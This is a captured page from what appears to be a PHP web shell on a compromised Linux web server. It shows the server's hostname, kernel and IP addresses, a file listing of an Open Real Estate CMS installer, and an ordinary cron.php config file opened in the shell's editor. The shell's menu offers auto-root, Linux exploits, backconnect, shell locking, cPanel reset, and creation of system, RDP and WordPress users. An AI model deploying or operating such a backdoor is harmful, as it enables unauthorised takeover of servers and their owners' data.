Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.21.244.34
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
realestate /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
already_install
5
B
-rw-r--r--
changelog.txt
1.1
KB
-rw-r--r--
clone.php
3.17
KB
-rw-r--r--
cron.php
2.45
KB
-rw-r--r--
db.php
519
B
-rw-r--r--
edit.php
4.44
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
122
B
-rw-r--r--
import.php
3.78
KB
-rw-r--r--
info.xml
3.31
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
5.35
KB
-rw-r--r--
install.xml
925
B
-rw-r--r--
md5
3.34
KB
-rw-r--r--
notes.txt
79
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cron.php
<?php require_once(dirname(__FILE__) . '/../helpers/common.php'); $physicalPath = realpath(dirname(__FILE__) . DIRECTORY_SEPARATOR . '..' . DIRECTORY_SEPARATOR . '..'); Yii::setPathOfAlias('webroot', $physicalPath); Yii::setPathOfAlias('webroot.uploads', $physicalPath . DIRECTORY_SEPARATOR . 'uploads'); Yii::setPathOfAlias('webroot.uploads.objects', $physicalPath . DIRECTORY_SEPARATOR . 'uploads' . DIRECTORY_SEPARATOR . 'objects'); $baseHost = '[[softurl]]'; $_SERVER['SERVER_NAME'] = $_SERVER['HTTP_HOST'] = $baseHost; $config = array( 'basePath' => dirname(__FILE__) . DIRECTORY_SEPARATOR . '..', 'name' => 'OpenRealEstateCMSCron'.md5($baseHost), 'preload' => array('log'), 'components' => array( 'request' => array( 'hostInfo' => $baseHost, 'baseUrl' => '', 'scriptUrl' => '', ), ), ); if (file_exists(dirname(__FILE__) . '/main.php')) { $mainConfig = require(dirname(__FILE__) . '/main.php'); } else { $mainConfig = require(dirname(__FILE__) . '/main-free.php'); } $mergeArr = CMap::mergeArray($config, $mainConfig); if (isset($mergeArr['theme'])) { unset($mergeArr['theme']); } if (isset($mergeArr['onBeginRequest'])) { unset($mergeArr['onBeginRequest']); } if (isset($mergeArr['components']['user'])) { $mergeArr['components']['user']['class'] = 'ConsoleUser'; $mergeArr['components']['user']['primaryKey'] = 1; unset($mergeArr['components']['user']['allowAutoLogin']); unset($mergeArr['components']['user']['loginUrl']); } # вырубаем всё не нужное - чтобы работала генерация ссылок в Notifier через createUrl/createAssoluteUrl if (isset($mergeArr['components']['request']['enableCsrfValidation'])) { unset($mergeArr['components']['request']['enableCsrfValidation']); } if (isset($mergeArr['components']['request']['noCsrfValidationRoutes'])) { unset($mergeArr['components']['request']['noCsrfValidationRoutes']); } if (isset($mergeArr['components']['request']['enableCookieValidation'])) { unset($mergeArr['components']['request']['enableCookieValidation']); } if (isset($mergeArr['components']['request']['csrfTokenName'])) { unset($mergeArr['components']['request']['csrfTokenName']); } if (isset($mergeArr['components']['request']['class'])) { unset($mergeArr['components']['request']['class']); } if (isset($mergeArr['controllerMap'])) { unset($mergeArr['controllerMap']); } return $mergeArr;
Close